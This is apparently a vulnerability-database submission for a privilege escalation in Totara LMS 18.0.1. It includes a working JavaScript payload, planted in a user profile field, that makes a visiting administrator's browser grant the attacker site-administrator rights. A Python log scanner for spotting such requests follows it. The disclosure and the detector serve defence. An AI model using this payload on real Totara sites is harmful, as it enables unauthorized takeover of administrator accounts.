Submit #314381: Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privilege Escalation

Title: Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privilege Escalation

Description:
# Exploit Title: CSRF Privilege Escalation Totara 18.0.1
# Date: 2024-04-10
# Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro)
# Category: webapps
# Tested on: Totara 18.0.1 (Build: 20231128.01)

# Proof Of Concept:
1. In your user profile modify the "ID Number" variable by entering the payload.
2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload.

# Payload
<script>
const http = new XMLHttpRequest();
http.open("POST", "/admin/roles/admins.php", false);
http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);
</script>

# The <USER ID> field must be modified by the value of your user.
# The variable "sesskey" is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey".

User: Anonymous User
Submission: 04/10/2024 19:35 (2 years ago)
Moderation: 04/17/2024 18:58 (7 days later)
Status: Accepted
VulDB entry: 261369 [Totara LMS up to 18.7 User Selector cross-site request forgery]
Points: 17
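
A defender-side check for the request pattern this submission describes, added here as an example and not part of the original submission or of Totara's code: it scans web server access logs for POSTs to "admin/roles/admins.php" that were sent from a different page such as "admin/roles/check.php". It assumes combined log format and that a genuine administrator change is submitted from admins.php itself; the host name and log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Combined log format:
# ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)
TARGET = "/admin/roles/admins.php"  # endpoint named in the submission
EXPECTED_REFERER = TARGET           # assumption: the real form posts from this page


def suspicious_admin_posts(lines):
    """Return (time, ip, referer_path) for POSTs to TARGET sent from another page."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        # endswith() also covers installs served from a sub-directory.
        if not urlsplit(m["target"]).path.endswith(TARGET):
            continue
        referer = m["referer"]
        ref_path = "" if referer in ("", "-") else urlsplit(referer).path
        if not ref_path.endswith(EXPECTED_REFERER):
            hits.append((m["time"], m["ip"], ref_path or "(none)"))
    return hits


# Constructed sample lines (not real traffic).
SAMPLE = [
    '203.0.113.10 - - [10/Apr/2024:19:40:01 +0000] "GET /admin/roles/check.php?contextid=1 HTTP/1.1" 200 5120 "https://lms.example.test/admin/index.php" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Apr/2024:19:40:02 +0000] "POST /admin/roles/admins.php HTTP/1.1" 200 812 "https://lms.example.test/admin/roles/check.php?contextid=1" "Mozilla/5.0"',
    '203.0.113.10 - - [11/Apr/2024:09:00:00 +0000] "POST /admin/roles/admins.php HTTP/1.1" 303 0 "https://lms.example.test/admin/roles/admins.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for when, ip, ref in suspicious_admin_posts(SAMPLE):
        print(f"{when} {ip} POST {TARGET} from {ref}")
```

A hit is a lead to review against the current list of site administrators, not proof of compromise, since Referer headers can be absent or stripped.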
